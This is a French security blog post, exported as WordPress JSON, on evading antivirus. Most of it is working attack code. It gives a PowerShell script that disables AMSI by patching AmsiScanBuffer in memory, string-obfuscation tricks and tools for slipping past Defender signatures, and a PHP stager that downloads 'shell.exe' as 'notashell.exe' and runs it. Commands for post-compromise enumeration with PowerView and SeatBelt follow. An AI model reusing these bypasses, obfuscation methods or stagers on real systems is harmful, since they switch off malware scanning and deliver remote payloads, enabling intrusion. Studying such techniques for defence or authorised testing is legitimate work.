Ce script permet de d\u00e9sactiver AMSI
\n
\n\/\/bypass.ps1\n$MethodDefinition = "\n\n [DllImport(`"kernel32`")]\n public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n\n [DllImport(`"kernel32`")]\n public static extern IntPtr GetModuleHandle(string lpModuleName);\n\n [DllImport(`"kernel32`")]\n public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);\n";\n\n$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;\n$ABSD = 'AmsiS'+'canBuffer';\n$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');\n[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);\n[UInt32]$Size = 0x5;\n[UInt32]$ProtectFlag = 0x40;\n[UInt32]$OldProtectFlag = 0;\n[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);\n$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3); \n\n[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);<\/code><\/pre><\/p>\nBien s\u00fbr, ce code sera d\u00e9tect\u00e9 par l’antivirus et il faut le modifier. AMSITrigger permet de trouver les r\u00e9f\u00e9rences qui d\u00e9clenchent les alertes.
\n.\\AmsiTrigger_x64.exe -i bypass.ps1 -f3<\/code><\/p>\nNous devons briser les cha\u00eenes de caract\u00e8res, car ces syst\u00e8mes se basent principalement sur les cha\u00eenes pour \u00e9tiqueter les malware. Voici donc des exemples en powershell pour rendre le code illisible.<\/p>\n
\nconcat\u00e9nation: $machaine=('Ge' + 'rmai' + 'n')\nr\u00e9arrangement: $machaine=('{2}{1}{0}'-f'n','rmai','Ge')\nespaces: $machaine =( 'Ger' + 'main' )\n<\/code><\/pre><\/p>\nType accelerators
\n
\/\/[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); devient\n("System.Management.Automation.TypeAccelerators")::Add('dorkstork', [system.runtime.interopservices.marshal])\n[dorkstork]::copy($buf, 0, $BufferAddress, 6);<\/code><\/pre><\/p>\nUtilitaires automatis\u00e9s pour cr\u00e9er des nouvelles cha\u00eenes
\nInvoke-Obfuscation -ScriptBlock {'code_a_modifier'} -Command 'Token\\\\String\\\\1,2,\\\\Whitespace\\\\1' -Quiet -NoExit<\/code><\/p>\nQuels bouts de code d\u00e9clenchent defender ?
\nTreatCheck.exe -f <fichier> <\/code><\/p>\nCode php pour ex\u00e9cuter du code
\n
<?php\n function get_stager() {\n $init = "powershell.exe";\n $payload = "Invoke-WebRequest 127.0.0.1:8000\/shell.exe -outfile notashell.exe"; \/\/ Insert PowerShell payload here\n $execution_command = "shell_exec";\n $query = $execution_command("$init $payload");\n echo $query; \/\/ Execute query\n }\n function execute_stager() {\n $init = "powershell.exe";\n $payload = ".\\notashell.exe"; \/\/ Insert PowerShell payload here\n $execution_command = "shell_exec";\n $query = $execution_command("$init $payload");\n echo $query; \/\/ Execute query\n }\n get_stager();\n execute_stager();\n die();\n?><\/code><\/pre><\/p>\nAppLocker (secpol.msc) restreint certains programmes. <\/p>\n
\n- Executable Rules #Que sont les ex\u00e9cutables et applications qui peuvent \u00eatre utilis\u00e9s dans les r\u00e9pertoires sp\u00e9cifi\u00e9s<\/li>\n
- Windows Installer Rules #Quels installers peuvent \u00eatre utilis\u00e9s<\/li>\n
- Script Rules #Quels sont les scripts qui peuvent \u00eatre utilis\u00e9s et \u00e0 quel endroit<\/li>\n
- Packaged app Rules #Applications windows pre-packaged qui peuvent \u00eatre utilis\u00e9s<\/li>\n<\/ul>\n
Le script applocker-bypas-checker.ps1<\/em> permet de trouver dans quel r\u00e9pertoire nous pourrons utiliser des scripts<\/p>\nSeatBelt permet d’avoir une vue d’ensemble des syst\u00e8mes de s\u00e9curit\u00e9<\/p>\n
\n- AMSIProviders<\/li>\n
- AntiVirus<\/li>\n
- Sysmon<\/li>\n
- WindowsDefender<\/li>\n
- WindowsEventForwarding<\/li>\n
- McAfeeConfigs<\/li>\n
- Processus d’int\u00e9r\u00eat : logiciels d’administration et logiciels de d\u00e9fense<\/li>\n<\/ul>\n
Modules offerts par SeatBelt<\/p>\n
\n- DotNet : Version .NET<\/li>\n
- DotNET : Group policies (GPO)<\/li>\n
- LocalGPOs : Groupes locaux<\/li>\n
- LocalGroups : Partages r\u00e9seaux<\/li>\n
- NetworkShares : Version de Powershell et param\u00e8tres de s\u00e9curit\u00e9<\/li>\n
- PowerShell : Processus<\/li>\n
- Processes : Privil\u00e8ges (seDebug)<\/li>\n
- TokenPrivileges : \u00c9num\u00e9ration d’identifiants de connexion<\/li>\n
- InterestingFiles : CredEnum : Fichiers int\u00e9ressants<\/li>\n
- ScheduledTasks : T\u00e2ches sch\u00e9dul\u00e9es<\/li>\n<\/ul>\n
SharpEDRChecker : \u00e9num\u00e8re les logiciels de s\u00e9curit\u00e9<\/p>\n
\n- FileChecker<\/li>\n
- ProcessChecker<\/li>\n
- ServiceChecker<\/li>\n
- DriverChecker<\/li>\n
- DirectoryChecker<\/li>\n<\/ul>\n
PowerView
\n
\nImport-Module .\\PowerView.ps1\nGet-NetLocalGroup\nGet-NetLocalGroupMember -Group Administrators\nGet-NetLoggedon\nGet-DomainGPO\nFind-LocalAdminAccess #v\u00e9rifie si l'utilisateur actuel est un administrateur local de d'autres machines sur le domaine\n<\/code><\/pre><\/p>\nParfois les outils SeatBelt et PowerView ne pourrons \u00eatre utilis\u00e9s. Nous pouvons utilis\u00e9s PowerUpGreySkull.ps1<\/p>\n
Import-Module .\\PowerUpGreySkull.ps1\nGet-ScheduledTask\nGet-ScheduledTask -TaskPath "\\Users*"\nGet-ScheduledTaskInfo -TaskName "Microsoft\\VisualStudio\\VSIX Auto Update"\nwhoami \/priv\nImport-Module ActiveDirectory; Get-ADGroup\nImport-Module ActiveDirectory; Get-ADGroupMember\nImport-Module ActiveDirectory; Get-ADPrincipalGroupMembership\nsamAccountName -like "*"\n<\/code><\/pre><\/p>\nAutres ressources<\/strong>
\nhttps:\/\/amsi.fail\/
\nhttps:\/\/s3cur3th1ssh1t.github.io\/Bypass_AMSI_by_manual_modification\/
\nhttps:\/\/0x00-0x00.github.io\/research\/2018\/10\/28\/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html<\/p>\n","protected":false},"excerpt":{"rendered":"Ce script permet de d\u00e9sactiver AMSI \/\/bypass.ps1 $MethodDefinition = " public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); public static extern IntPtr GetModuleHandle(string lpModuleName); public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; $ABSD = 'AmsiS'+'canBuffer'; $handle = ::GetModuleHandle('amsi.dll'); $BufferAddress = ::GetProcAddress($handle, $ABSD); $Size = 0x5; $ProtectFlag = 0x40; $OldProtectFlag = 0; ::VirtualProtect($BufferAddress, $Size, $ProtectFlag, $OldProtectFlag); $buf = ](0xB8,0x57, 0x00, 0x07, 0x80, 0xC3); ::copy($buf, 0, $BufferAddress, 6); Bien s\u00fbr, ce code sera d\u00e9tect\u00e9 par l’antivirus et il faut le modifier. AMSITrigger permet <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,22],"tags":[],"yoast_head":"\n
Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Ce script permet de d\u00e9sactiver AMSI \/\/bypass.ps1 $MethodDefinition = " public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); public static extern IntPtr GetModuleHandle(string lpModuleName); public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; $ABSD = 'AmsiS'+'canBuffer'; $handle = ::GetModuleHandle('amsi.dll'); $BufferAddress = ::GetProcAddress($handle, $ABSD); $Size = 0x5; $ProtectFlag = 0x40; $OldProtectFlag = 0; ::VirtualProtect($BufferAddress, $Size, $ProtectFlag, $OldProtectFlag); $buf = ](0xB8,0x57, 0x00, 0x07, 0x80, 0xC3); ::copy($buf, 0, $BufferAddress, 6); Bien s\u00fbr, ce code sera d\u00e9tect\u00e9 par l’antivirus et il faut le modifier. AMSITrigger permet\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-03T13:07:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-03T20:48:55+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/\",\"name\":\"Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-08-03T13:07:08+00:00\",\"dateModified\":\"2021-08-03T20:48:55+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Modifier du code pour s’\u00e9vader de l’antivirus\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/","og_locale":"fr_CA","og_type":"article","og_title":"Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site","og_description":"Ce script permet de d\u00e9sactiver AMSI \/\/bypass.ps1 $MethodDefinition = " public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); public static extern IntPtr GetModuleHandle(string lpModuleName); public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); "; $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru; $ABSD = 'AmsiS'+'canBuffer'; $handle = ::GetModuleHandle('amsi.dll'); $BufferAddress = ::GetProcAddress($handle, $ABSD); $Size = 0x5; $ProtectFlag = 0x40; $OldProtectFlag = 0; ::VirtualProtect($BufferAddress, $Size, $ProtectFlag, $OldProtectFlag); $buf = ](0xB8,0x57, 0x00, 0x07, 0x80, 0xC3); ::copy($buf, 0, $BufferAddress, 6); Bien s\u00fbr, ce code sera d\u00e9tect\u00e9 par l’antivirus et il faut le modifier. AMSITrigger permet","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-08-03T13:07:08+00:00","article_modified_time":"2021-08-03T20:48:55+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/","name":"Modifier du code pour s'\u00e9vader de l'antivirus - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-08-03T13:07:08+00:00","dateModified":"2021-08-03T20:48:55+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/modifier-du-code-pour-sevader-de-lantivirus\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Modifier du code pour s’\u00e9vader de l’antivirus"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/751"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=751"}],"version-history":[{"count":10,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/751\/revisions"}],"predecessor-version":[{"id":767,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/751\/revisions\/767"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}